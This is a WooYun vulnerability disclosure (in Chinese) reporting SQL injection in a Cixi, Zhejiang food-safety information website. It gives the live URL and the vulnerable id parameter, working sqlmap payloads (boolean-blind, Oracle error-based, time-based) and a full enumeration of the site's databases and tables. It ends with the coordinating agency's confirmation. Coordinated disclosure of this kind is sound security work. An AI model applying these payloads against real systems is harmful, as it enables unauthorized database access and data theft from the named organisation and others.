当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096148

漏洞标题:浙江某市某系统存在SQL注射oracle数据库

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-02-10 16:11

修复时间:2015-03-27 16:12

公开时间:2015-03-27 16:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-10: 细节已通知厂商并且等待厂商处理中
2015-02-13: 厂商已经确认,细节仅向厂商公开
2015-02-23: 细节向核心白帽子及相关领域专家公开
2015-03-05: 细节向普通白帽子公开
2015-03-15: 细节向实习白帽子公开
2015-03-27: 细节向公众公开

简要描述:

浙江某市某系统存在SQL注射

详细说明:

慈溪市食品安全信息网 商品准入系统
大量信息
搞不懂一个asp站竟然搭载了一个oracle数据库

1.png


http://www.cxaic.gov.cn/xgwj/xgwj_show.asp?id=2

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 4468=4468
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=2 AND 1494=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (1494=1494) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=2 AND 3118=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(78)||CHR(75)||CHR(82),5)
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Oracle


back-end DBMS: Oracle
available databases [26]:
[*] CTXSYS
[*] CXFOOD
[*] CXHD
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
Database: WKSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| WK$CHARSET | 57 |
| WK$CRAWLER_CONFIG_DEFAULT | 38 |
| WK$MIMETYPES | 35 |
| WK$LANG | 14 |
| WK$SYS_CONFIG | 1 |
+-----------------------------+---------+
Database: QS_OS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| AQ$_QS_OS_ORDERS_MQTAB_S | 1 |
| AQ$_QS_OS_ORDERS_PR_MQTAB_S | 1 |
+-----------------------------+---------+
Database: ORDSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| ORD_CARTRIDGE_COMPONENTS | 86 |
| JACCELERATOR$DLLS | 14 |
| ORD_INSTALLATIONS | 1 |
+-----------------------------+---------+
Database: HR
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| EMPLOYEES | 107 |
| DEPARTMENTS | 27 |
| COUNTRIES | 25 |
| LOCATIONS | 23 |
| JOBS | 19 |
| JOB_HISTORY | 10 |
| REGIONS | 4 |
+-----------------------------+---------+
Database: OLAPSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| CWM$ITEMUSE | 118 |
| CWM$LEVELATTRIBUTE | 67 |
| CWM$CLASSIFICATIONENTRY | 66 |
| CWM$ITEMMAP | 59 |
| CWM$LEVEL | 27 |
| CWM$CLASSIFICATION | 24 |
| CWM$DIMENSIONATTRIBUTE | 23 |
| CWM$DOMAIN | 21 |
| CWM$FUNCTION | 13 |
| CWM$CLASSIFICATIONTYPE | 10 |
| CWM$OBJECTTYPE | 10 |
| CWM$CUBEDIMENSIONUSE | 7 |
| CWM$FACTLEVELUSE | 7 |
| CWM$HIERARCHY | 7 |
| CWM$DIMENSION | 5 |
| CWM$PARAMETER | 5 |
| CWM$FACTUSE | 4 |
| CWM$FUNCTIONUSE | 4 |
| CWM$MEASURE | 4 |
| CWM$MEASUREDIMENSIONUSE | 4 |
| CWM$MODEL | 3 |
| CWM$PROJECT | 3 |
| CWM$CUBE | 2 |
| CWM$FACTLEVELGROUP | 2 |
| CWM$FACTTABLEMAP | 2 |
+-----------------------------+---------+
Database: XDB
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| XDB$H_INDEX | 12 |
| XDB$ROOT_INFO | 1 |
+-----------------------------+---------+
Database: QS_CS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| AQ$_QS_CS_ORDER_STATUS_QT_S | 1 |
+-----------------------------+---------+
Database: MDSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| CS_SRS | 1000 |
| SDO_DATUMS | 118 |
| MD$RELATE | 90 |
| SDO_DIST_UNITS | 54 |
| SDO_AREA_UNITS | 48 |
| SDO_ELLIPSOIDS | 47 |
| SDO_PROJECTIONS | 42 |
| SDO_ANGLE_UNITS | 12 |
+-----------------------------+---------+
Database: ODM
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| ODM_ERROR_TABLE | 342 |
| ODM_CONFIGURATION | 25 |
| ODM_INTERNAL_CONFIGURATION | 19 |
| ODM_PMML_DTD | 1 |
+-----------------------------+---------+
Database: QS_CBADM
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| AQ$_QS_CBADM_ORDERS_MQTAB_S | 3 |
+-----------------------------+---------+
Database: CTXSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| DR$STOPWORD | 152 |
| DR$OBJECT_ATTRIBUTE | 135 |
| DR$OBJECT_ATTRIBUTE_LOV | 106 |
| DR$SECTION | 103 |
| DR$INDEX_VALUE | 80 |
| DR$OBJECT | 44 |
| DR$PREFERENCE | 31 |
| DR$PARAMETER | 27 |
| DR$PREFERENCE_VALUE | 15 |
| DR$CLASS | 11 |
| DR$INDEX_OBJECT | 9 |
| DR$SECTION_GROUP | 6 |
| DR$STOPLIST | 3 |
| DR$SUB_LEXER | 3 |
| DR$INDEX | 1 |
| DR$INDEX_SET | 1 |
+-----------------------------+---------+
Database: QS_ES
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| AQ$_QS_ES_ORDERS_MQTAB_S | 1 |
| AQ$_QS_ES_ORDERS_PR_MQTAB_S | 1 |
+-----------------------------+---------+
Database: PM
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| ONLINE_MEDIA | 9 |
| PRINT_MEDIA | 4 |
+-----------------------------+---------+
Database: RMAN
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| CONFIG | 1 |
| RCVER | 1 |
+-----------------------------+---------+
Database: QS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| AQ$_AQ$_MEM_MC_S | 1 |
| AQ$_QS_ORDERS_PR_MQTAB_S | 1 |
+-----------------------------+---------+
Database: ODM_MTR
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| MAGAZINE_2D_BUILD_BINNED | 6012 |
| EIGHT_CLOUDS_APPLY_UNBINNED | 4000 |
| EIGHT_CLOUDS_BUILD_UNBINNED | 4000 |
| MARKET_BASKET_TX_BINNED | 3800 |
| CENSUS_2D_BUILD_BINNED | 2940 |
| CENSUS_2D_BUILD_UNBINNED | 2940 |
| MAGAZINE_2D_TEST_BINNED | 2613 |
| CENSUS_2D_APPLY_BINNED | 1226 |
| CENSUS_2D_APPLY_UNBINNED | 1226 |
| MARKET_BASKET_2D_BINNED | 1000 |
| CENSUS_2D_TEST_BINNED | 834 |
| CENSUS_2D_TEST_UNBINNED | 834 |
+-----------------------------+---------+
Database: QS_WS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| AQ$_QS_WS_ORDERS_MQTAB_S | 5 |
| AQ$_QS_WS_ORDERS_PR_MQTAB_S | 1 |
+-----------------------------+---------+
Database: OE
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| PRODUCT_DESCRIPTIONS | 8640 |
| INVENTORIES | 1112 |
| ORDER_ITEMS | 665 |
| CUSTOMERS | 319 |
| PRODUCT_INFORMATION | 288 |
| ORDERS | 105 |
| WAREHOUSES | 9 |
+-----------------------------+---------+
Database: SYSTEM
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| HELP | 918 |
| LOGSTDBY$SKIP_SUPPORT | 74 |
| AQ$_QUEUES | 40 |
| MVIEW$_ADV_PARAMETERS | 40 |
| REPCAT$_OBJECT_TYPES | 28 |
| REPCAT$_RESOLUTION_METHOD | 19 |
| AQ$_QUEUE_TABLES | 17 |
| REPCAT$_TEMPLATE_STATUS | 3 |
| REPCAT$_AUDIT_ATTRIBUTE | 2 |
| REPCAT$_TEMPLATE_TYPES | 2 |
+-----------------------------+---------+
Database: SYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| SOURCE$ | 152856 |
| DEPENDENCY$ | 50252 |
| ARGUMENT$ | 47847 |
| ACCESS$ | 43428 |
| COL$ | 35351 |
| IDL_UB1$ | 32748 |
| OBJ$ | 30248 |
| TEST | 29636 |
| IDL_SB4$ | 19215 |
| IDL_UB2$ | 17051 |
| OBJAUTH$ | 13923 |
| IDL_CHAR$ | 12526 |
| SYN$ | 11560 |
| PROCEDUREINFO$ | 10422 |
| COM$ | 7148 |
| JAVASNM$ | 6607 |
| SETTINGS$ | 4316 |
| CCOL$ | 3430 |
| ATTRIBUTE$ | 3336 |
| CON$ | 3136 |
| CDEF$ | 3135 |
| SEG$ | 2655 |
| VIEW$ | 2541 |
| PARAMETER$ | 2531 |
| ICOL$ | 1923 |
| SMON_SCN_TIME | 1440 |
| IND$ | 1361 |
| PROCEDURE$ | 1315 |
| ATTRCOL$ | 1124 |
| COLTYPE$ | 1103 |
| OID$ | 1070 |
| SYSAUTH$ | 1057 |
| METHOD$ | 1036 |
| TAB$ | 925 |
| TYPE$ | 851 |
| TYPE_MISC$ | 843 |
| VTABLE$ | 759 |
| RESULT$ | 696 |
| HIST_HEAD$ | 536 |
| HS$_BASE_CAPS | 490 |
| PROCEDUREJAVA$ | 434 |
| LOB$ | 366 |
| COL_USAGE$ | 319 |
| PROCEDUREC$ | 234 |
| METAFILTER$ | 220 |
| COLLECTION$ | 207 |
| TRIGGERCOL$ | 193 |
| STMT_AUDIT_OPTION_MAP | 167 |
| SEQ$ | 157 |
| SYSTEM_PRIVILEGE_MAP | 157 |
| AUDIT_ACTIONS | 144 |
| TYPED_VIEW$ | 136 |
| INDPART$ | 128 |
| NTAB$ | 121 |
| TRIGGER$ | 121 |
| HS$_BASE_DD | 102 |
| OPARG$ | 101 |
| LIBRARY$ | 90 |
| METAXSLPARAM$ | 84 |
| JAVA$POLICY$ | 77 |
| EXPDEPACT$ | 73 |
| DIMATTR$ | 71 |
| METAVIEW$ | 70 |
| NOEXP$ | 66 |
| USER$ | 64 |
| REFCON$ | 61 |
| PARTCOL$ | 60 |
| PARTOBJ$ | 60 |
| METASTYLESHEET | 58 |
| BOOTSTRAP$ | 57 |
| EXPDEPOBJ$ | 57 |
| METAXSL$ | 57 |
| PS$ | 55 |
| TABPART$ | 55 |
| TYPEHIERARCHY$ | 48 |
| OPBINDING$ | 40 |
| LOGMNR_INTERESTING_COLS | 34 |
| INDOP$ | 33 |
| HIERLEVEL$ | 31 |
| OPQTYPE$ | 29 |
| OPERATOR$ | 28 |
| DIMLEVEL$ | 27 |
| DIMLEVELKEY$ | 27 |
| SUBCOLTYPE$ | 27 |
| TSQ$ | 27 |
| UTL_RECOMP_COMPILED | 26 |
| PROPS$ | 25 |
| TABLE_PRIVILEGE_MAP | 23 |
| EXPPKGACT$ | 21 |
| UNDO$ | 21 |
| JACCELERATOR$DLLS | 19 |
| RLS$ | 18 |
| AQ$_QUEUE_TABLE_AFFINITIES | 17 |
| EXPACT$ | 17 |
| PROFILE$ | 17 |
| RESOURCE_MAP | 16 |
| REGISTRY$ | 15 |
| RULE_SET$ | 15 |
| OPANCILLARY$ | 14 |
| TS$ | 14 |
| FILE$ | 12 |
| OLAP$ALTER_SESSION | 11 |
| RULE_EC$ | 11 |
| CLU$ | 10 |
| REC_TAB$ | 10 |
| RESOURCE_COST$ | 10 |
| EXPPKGOBJ$ | 9 |
| ICOLDEP$ | 9 |
| INDTYPES$ | 9 |
| USER_ASTATUS_MAP | 9 |
| DUC$ | 8 |
| ASSOCIATION$ | 7 |
| HIER$ | 7 |
| RESOURCE_PLAN_DIRECTIVE$ | 6 |
| DIM$ | 5 |
| SNAP_LOGDEP$ | 5 |
| SNAP_REFTIME$ | 5 |
| SUMDEP$ | 5 |
| SUMDETAIL$ | 5 |
| SUMKEY$ | 5 |
| RESOURCE_CONSUMER_GROUP$ | 4 |
| SQL_VERSION$ | 4 |
| SUMPRED$ | 4 |
| DIR$ | 3 |
| JAVA$POLICY$SHARED$TABLE | 3 |
| RESOURCE_PLAN$ | 3 |
| SNAP_LOADERTIME$ | 3 |
| SUMJOIN$ | 3 |
| AW$ | 2 |
| CONTEXT$ | 2 |
| REC_VAR$ | 2 |
| REG_SNAP$ | 2 |
| SNAP$ | 2 |
| SUM$ | 2 |
| SUMAGG$ | 2 |
| TRIGGERJAVAC$ | 2 |
| TRIGGERJAVAF$ | 2 |
| TRIGGERJAVAM$ | 2 |
| TRIGGERJAVAS$ | 2 |
| "DUAL" | 1 |
| AURORA$SHUTDOWN$CLASSES$ | 1 |
| AURORA$STARTUP$CLASSES$ | 1 |
| AW$CWMTOECM | 1 |
| AW$EXPRESS | 1 |
| CDC_CHANGE_SETS$ | 1 |
| CDC_CHANGE_SOURCES$ | 1 |
| CDC_SYSTEM$ | 1 |
| DIMJOINKEY$ | 1 |
| EXTERNAL_LOCATION$ | 1 |
| EXTERNAL_TAB$ | 1 |
| HS$_FDS_CLASS | 1 |
| HS$_FDS_CLASS_DATE | 1 |
| ID_GENS$ | 1 |
| INCVID | 1 |
| JAVA$JVM$STATUS | 1 |
| KOPM$ | 1 |
| MIGRATE$ | 1 |
| PROFNAME$ | 1 |
| SNAP_REFOP$ | 1 |
| SUPEROBJ$ | 1 |
| TRUSTED_LIST$ | 1 |
| VIEWTRCOL$ | 1 |
+-----------------------------+---------+
Database: CXHD
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| ZL_SPDJB | 87177 |
| ZL_GYS | 10034 |
| SB_DJB | 8413 |
| ZL_QYNEW | 147 |
| SB_JCB | 67 |
| ZL_GG | 51 |
| SB_QYXX | 45 |
| ZL_QYFC | 33 |
| ZL_SF | 33 |
| SB_USERS | 23 |
| ZL_QYGLZD | 15 |
| ZL_BM | 14 |
| SB_BM | 12 |
| ZL_LB | 12 |
| ZL_QY | 12 |
| HD_ADMIN | 11 |
| ZL_PART | 8 |
| ZL_USERS | 7 |
| SB_PART | 6 |
| ZL_XGWJ | 5 |
| ZNLB | 3 |
+-----------------------------+---------+
Database: SH
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| SALES | 1016271 |
| COSTS | 787766 |
| FWEEK_PSCAT_SALES_MV | 149325 |
| CUSTOMERS | 50000 |
| PRODUCTS | 10000 |
| TIMES | 1461 |
| PROMOTIONS | 501 |
| CAL_MONTH_SALES_MV | 35 |
| COUNTRIES | 19 |
| CHANNELS | 5 |
+-----------------------------+---------+
Database: SCOTT
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| EMP | 14 |
| SALGRADE | 5 |
| DEPT | 4 |
+-----------------------------+---------+
Database: WMSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| WM$WORKSPACE_PRIV_TABLE | 8 |
| WM$ENV_VARS | 1 |
| WM$VERSION_HIERARCHY_TABLE | 1 |
| WM$WORKSPACES_TABLE | 1 |
+-----------------------------+---------+
Database: CXFOOD
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| SPJCDJB | 2375333 |
| JCCS_TJ | 124025 |
| YWZD | 4870 |
| DTXX | 1500 |
| GUESTBOOK | 901 |
| FXDG | 795 |
| JCXX | 281 |
| HD_ADMIN | 194 |
| JCDXX | 126 |
| FLFG | 85 |
| UTABLE | 70 |
| SPQY | 68 |
| TZGL | 61 |
| JCXM | 27 |
| BMLB | 16 |
| JCSB | 15 |
| XFTS | 14 |
| SPZL | 13 |
| GGXX | 10 |
| MYXX | 9 |
| XXLY | 7 |
| FLFGLB | 4 |
| PART | 4 |
| DTXXLB | 3 |
| JCLB | 3 |
+-----------------------------+---------+

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-13 09:52

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无